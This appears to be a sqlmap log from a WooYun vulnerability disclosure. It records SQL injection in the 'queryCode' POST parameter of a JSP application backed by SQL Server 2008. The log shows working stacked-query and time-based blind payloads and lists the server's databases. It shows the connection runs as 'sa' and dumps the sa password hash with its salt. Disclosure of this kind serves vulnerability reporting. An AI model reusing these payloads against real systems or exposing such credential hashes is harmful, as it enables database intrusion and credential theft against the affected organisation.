WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: queryCode
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: queryCode=1'); WAITFOR DELAY '0:0:5';-- AND ('egSg'='egSg&pwd=1&startTime=2015-01-04&endTime=2015-08-04&keyWord=1
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: queryCode=1') WAITFOR DELAY '0:0:5'-- AND ('JckC'='JckC&pwd=1&startTime=2015-01-04&endTime=2015-08-04&keyWord=1
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] csrc_inb
[*] master
[*] model\14
[*] msdb
[*] ReportServer$SERVERDB
[*] ReportServer$SERVERDBTempDB
[*] tempdb
[*] test1
current user:    'sa'
database management system users password hashes:
[*] sa [1]:
    password hash: 0x0100b305d51f8ebcb632e990e3bf86a7920cfa697f29e6044563
        header: 0x0100
        salt: b305d51f
        mixedcase: 8ebcb632e990e3bf86a7920cfa697f29e6044563